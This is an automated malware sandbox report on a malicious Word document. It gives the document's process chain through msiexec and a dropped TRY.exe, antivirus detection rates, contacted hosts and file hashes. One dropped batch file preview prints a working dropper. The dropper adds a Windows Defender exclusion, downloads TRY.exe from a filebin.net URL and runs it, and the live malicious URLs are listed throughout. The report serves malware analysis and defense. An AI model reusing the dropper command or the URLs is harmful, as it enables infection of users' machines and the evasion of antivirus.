Process tree recovered from the graph:
WINWORD.EXE (started; dropped C:\Users\user\...\~DFC2FF7A9553E7F48E.TMP, Composite)
rundll32.exe (started)
msiexec.exe (started; connected to filebin.net 185.47.40.36 port 443 from local port 49173 and situla.bitbit.net 87.238.33.8 port 443 from local port 49174, both REDPILL-LINPRORedpillLinproNO, Norway; dropped C:\Windows\Installer\MSI9F1.tmp, PE32)
  msiexec.exe (child)
    TRY.exe
      cmd.exe
        powershell.exe
        powershell.exe
    expand.exe (dropped C:\Users\user\AppData\...\TRY.exe (copy), PE32+ and C:\...\79bd875a22ddb24abfa2594fbd40eccf.tmp, PE32+)
    icacls.exe
    icacls.exe

Source | Detection | Scanner | Label | Link
12543_0008858249_FWDOUTSTANDING_20200604.doc | 38% | Virustotal | | Browse
12543_0008858249_FWDOUTSTANDING_20200604.doc | 24% | ReversingLabs | Win32.Downloader.Mutisedow |
12543_0008858249_FWDOUTSTANDING_20200604.doc | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP | 100% | Joe Sandbox ML | |
C:\Windows\Installer\MSI9F1.tmp | 0% | Metadefender | | Browse
C:\Windows\Installer\MSI9F1.tmp | 0% | ReversingLabs | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
filebin.net | 5% | Virustotal | | Browse
situla.bitbit.net | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470 | 100% | Avira URL Cloud | malware |
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi | 100% | Avira URL Cloud | malware |
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe | 100% | Avira URL Cloud | malware |
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C: | 100% | Avira URL Cloud | malware |
https://filebin.net/rf43v6qzghbj7h7b/ | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
filebin.net | 185.47.40.36 | true | true | | unknown
situla.bitbit.net | 87.238.33.8 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470 | ~DFECA159C20646BB57.TMP.2.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe | expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C: | 535fae.ipi.2.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/ | ~DFECA159C20646BB57.TMP.2.dr | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
87.238.33.8 | situla.bitbit.net | Norway | 39029 | REDPILL-LINPRORedpillLinproNO | false
185.47.40.36 | filebin.net | Norway | 39029 | REDPILL-LINPRORedpillLinproNO | true
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:611840
Start date and time: 2022-04-20 09:18:03 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 35s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.winDOC@19/23@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 58.5%)
  • Quality average: 35.5%
  • Quality standard deviation: 35.4%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, conhost.exe
  • TCP Packets have been reduced to 100
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
09:19:15 | API Interceptor | 1365x Sleep call for process: msiexec.exe modified
09:19:24 | API Interceptor | 1x Sleep call for process: icacls.exe modified
09:19:31 | API Interceptor | 31x Sleep call for process: powershell.exe modified
09:19:36 | API Interceptor | 17x Sleep call for process: cmd.exe modified
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):9216
Entropy (8bit):4.161759538213247
Encrypted:false
SSDEEP:96:6/4AVtYE5uI3U33ZsYEFL2l4oK3B24CxkZFivEwj98l1vu+X0jUrw62tbaAGi7A:6/4AVtF368vB27xkZF5P50jcw60aWA
MD5:D295AD2809D07DCE046748F3AF1C5035
SHA1:9E774C670AB933D4E984EFCE44B815781FDDCB5A
SHA-256:BC4DCE07AAA38FFD6445499BFF0DA6C48F5400C2A7FAA04B3F5BE2D273DE319E
SHA-512:9E7F25992E9B672FF95802703EDB822737BFCAF61425910B3DE80304AAD18D562FD270928EC68EA370E5604AF037A2BF0897D8AFFC87ABAAA6D3D94F202BEAC0
Malicious:false
Yara Hits:
  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, Author: Nils Kuhnert
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):192
Entropy (8bit):5.038473612824116
Encrypted:false
SSDEEP:3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
MD5:0187F7CF14FF509BAFFEEDC6909AEF04
SHA1:01689D0CD0070F66D2FA1465E79C43641A52574D
SHA-256:C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
SHA-512:63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
Malicious:false
Preview:@echo off..powershell -command "Set-MpPreference -ExclusionExtension ".exe"..powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"..start TRY.exe
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:Microsoft Cabinet archive data, 155244 bytes, 1 file
Category:dropped
Size (bytes):155244
Entropy (8bit):6.820072420859643
Encrypted:false
SSDEEP:3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
MD5:2A683F9BE589B6F5581EA6298C95AFBC
SHA1:B78112E20E2E465B58D803BF93ED458FE8492161
SHA-256:8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
SHA-512:731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
Malicious:false
Preview: MSCF cabinet header followed by the packed TRY.exe (MZ/PE header, "This program cannot be run in DOS mode", sections .text .rdata .data .pdata .rsrc .reloc); remaining preview bytes are non-printable
Process:C:\Windows\SysWOW64\expand.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):155136
Entropy (8bit):6.821026780783546
Encrypted:false
SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:false
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text .rdata .data .pdata .rsrc .reloc; remaining preview bytes are non-printable
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:data
Category:dropped
Size (bytes):1412
Entropy (8bit):3.6357831688439908
Encrypted:false
SSDEEP:24:f3dX8DW8dfja/0vZ4MBlolESIFEqHmnqHmLyDqHmVo+TGTlh+Bl/rB:fe7Z4MB6lmFxGqGL7GjklS/V
MD5:CE0A48B68AFABF1CB63A84452E99662A
SHA1:D79EB8F957A252FB363FF36F67B39E1FA1524468
SHA-256:4C86CD17EDA9F4A42B361023E7AE6E1CCCEE9AEB547F375A3D2936217A5ED713
SHA-512:AB8D97D03F2EF4BE45CD7CEABE8ACE93FF9266BFCA6CB4D939A06F9E8A57343C5CE559BDB004A4D81ABAC3AB7ADE9B6D9761014B0F60A27871FB60E0E8CC6B16
Malicious:false
Preview (UTF-16 text, decoded; the preview is truncated at the end):
WrappedApplicationId=
WrappedRegistration=Hidden
InstallSuccessCodes=0
ElevationMode=administrators
BaseName=TRY.exe
CabHash=8a64b66f67d4c199154659b5bb448173b46c1adb1b2f9ae24ceff17c858b96d5
SetupParameters=
WorkingDir=
CurrentDir=*SOURCEDIR*
UILevel=2
Focus=no
SessionDir=C:\Users\Albus\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\
FilesDir=C:\Users\Albus\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\
RunBeforeInstallFile=
RunBeforeInstallParameters=
RunAfterInsta
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):26624
Entropy (8bit):4.023285459983812
Encrypted:false
SSDEEP:384:G9FbvNwIWWwxN6rX0jb4e/9wCwQDtASlRGfafyZ:80WwGLc4elwx6Gfaf
MD5:AEE6E4E3E1679CAB2BC9711D046AE750
SHA1:EE2D2003C4E7208C030246BE3556934955D33100
SHA-256:C1A2B5412658B2EDD4F423C35439CF69DFFCAD442AA2D786672A925ACAE064E7
SHA-512:0C7723B855F42C78018352BB2533A2B4CD484352A4DECCD7AC5C2D19F067F6448F6E14DFCE182AC8129C091531E4E04B33B3DEF63562967F3D068A04F2D9C86C
Malicious:true
Yara Hits:
  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Nils Kuhnert
  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Florian Roth
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.............................................................................../...............#................... ...!...".......$...%...&...'...(...)...*...+...,...-.......1...........2...................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):69632
Entropy (8bit):0.14963723887749986
Encrypted:false
SSDEEP:48:6o6vwrfddSsPiK3ddSH9ZauSiCPiKe6NPiK:Wvq3/OAWiFt
MD5:AC6A84118D10D91CB02AE02773436BFF
SHA1:A630E822DD052856EDF8D5068E39C683F5BD5644
SHA-256:EF15F83FD5723D8FB1470F93EAE79E858F4DDE5081A2EDE2B9271D915325C478
SHA-512:84AC382BF232FF446F404024FF1CE14AEA8BFD33F7B4CFECC119FDEBD627F5C8ECBD7091047E4D2093730BCF9A63F282E847BF4729610C8D2BD3E43E2C0D521E
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Wed Apr 20 15:19:12 2022, length=62976, window=hide
Category:dropped
Size (bytes):1164
Entropy (8bit):4.5147077000165785
Encrypted:false
SSDEEP:24:88/XThOMPG/xfm+oeK8vvBlD+5Dv3qaqtT7qtk:88/XT4xxfRoH8iQaqlqG
MD5:7ADD8F1D611B2857204C2BC42CC44A28
SHA1:AC6C1E2E73C4AD815192F3229B2EB587FB9F1CAA
SHA-256:E9A69AB15E044FE4045CF020AF86328465BDA02B387F8E6CC404D115E27A69A8
SHA-512:626CE7ADFDD6F4B40A404599EC44B79EB95E42D0B6C7B0B21F0F4C6A4F2FC47AB74AE33E9732C0D9AE3A1EFE3E4521C0393E786604362425C20FEDF31F2A97A8
Malicious:false
Preview:L..................F.... ...E....3..E....3...{._.T...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Tg. .12543_~1.DOC.........hT..hT..*...r.....'...............1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\12543_0008858249_FWDOUTSTANDING_20200604.doc.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):131
Entropy (8bit):4.970285316783502
Encrypted:false
SSDEEP:3:bDuMJlBPddqc6Kw7XVLR6YVomX1UXWddqc6Kw7XVLR6YVov:bCUPddqc6N7Xy4cXWddqc6N7Xy4y
MD5:AC465E397B58BF09906407F06803641B
SHA1:91C663F69C167B45184DB10BE2368073F56B7DD6
SHA-256:9F3CFAB15CF36A28AFD1552EEEF61449EBD28BEC40F42BA88E2FD86859F3D023
SHA-512:C0BCF40F37E7FAAB60C4822663B95F232003CDF8B701444B741AFB5271410C1FFBC9F76E1D8879470D6A35E557C5C2D370513E993CF7CB626A9750A31B03F65C
Malicious:false
Preview:[folders]..Templates.LNK=0..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..[doc]..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
MD5:C5E24006AFAC8C2659023AD09A07EB0F
SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
MD5:C5E24006AFAC8C2659023AD09A07EB0F
SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.6013944557991673
Encrypted:false
SSDEEP:48:Ks0AcDHPbuKPiKqQsddSH9ZauSiCPiKejddSsPiKVrpvWo:KsFb6qQ6OAWiq3Pv
MD5:7C98B8E591E539177CC02866DD0D4140
SHA1:620B461823FAF2BBF8F2E9124DA2878D73CF7849
SHA-256:4BA4989BE7C8A499EA5EAB02CA287ECCF89A5BED08F075BE412142776E2B8721
SHA-512:D3E8357262B3884D6C3AA5318070566DB3720AEA6E8D741CB6133DCF90102A8C3174CB369BEEE949CF4E10A7D911D48E3051E474CA32F07C4730FCC195297567
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
Category:dropped
Size (bytes):491520
Entropy (8bit):6.791342319398629
Encrypted:false
SSDEEP:6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
MD5:260BEC1B34CE96E5ED6C42D51E7146FB
SHA1:57EC75201B4957B5C9F4266264E4A3C953255801
SHA-256:29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
SHA-512:A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):212992
Entropy (8bit):6.513444216841171
Encrypted:false
SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
MD5:4CAAA03E0B59CA60A3D34674B732B702
SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
Malicious:false
Antivirus:
  • Antivirus: Metadefender, Detection: 0%
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\expand.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):969
Entropy (8bit):4.307877893758803
Encrypted:false
SSDEEP:24:a+m2H6Kb2Y76Kb2H6Kb2Y76Kb2Y6m2+m2H6Kb2Y76Kb2Y6r:ck6Kb96Kbk6Kb96Kbb4k6Kb96KbA
MD5:B193C14C2275982386C9C24BE523ED52
SHA1:DFAABC4AC43E7A77882BADE797F5415C6494CF3A
